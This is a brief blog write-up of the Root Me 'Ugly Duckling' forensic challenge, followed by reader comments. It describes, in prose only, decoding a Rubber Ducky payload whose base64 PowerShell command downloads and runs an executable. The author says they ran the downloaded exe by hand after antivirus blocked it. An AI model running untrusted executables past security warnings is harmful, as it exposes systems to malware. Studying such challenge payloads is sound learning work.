Root Me - Ugly Duckling - Forensic Challenge

Challenge Link: https://www.root-me.org/en/Challenges/Forensic/Ugly-Duckling

We're a given a file that we need to analyse. Initial analysis with the file, exiftool, foremost and binwalk did not show anything interesting. So I decided to look up the root-me forums regarding this challenge. I found this: https://www.root-me.org/?page=forum&id_thread=7300&lang=en#forum10458. Apparently, it refers to a Rubber Ducky USB. Threfore, it must be the compiled script. So, I just need to decompile it. A quick Google search led me to this: https://ducktoolkit.com/. But that did not work. And then I found this: https://github.com/hak5darren/USB-Rubber-Ducky/blob/master/Decode/ducky-decode.pl. Now it works.

Seems like it is executing a malicious code....

Googled about the 'enc' parameter of powershell and found this: https://artofpwn.com/offensive-and-defensive-powershell-ii.html. So it is in base64 encoding. Decoding...

The binary file downloads an executable and runs it. Tried to run the file in powershell but my antivirus program blocked it. So I just downloaded the exe manually and then run it. Finally, the flag shows up.

Comments

Avishay116November 17, 2019 at 2:36 AM
Thanks man!
I like your blog (:
raoufmorsiJanuary 11, 2021 at 12:09 PM
Hello brother, for me https://ducktoolkit.com/ worked perfectly, and i did not execute it, i just put it in virustotal.com the flag is there in the behavior section ;)

The Avenger

Search This Blog

Root Me - Ugly Duckling - Forensic Challenge - Write-up

Comments

Post a Comment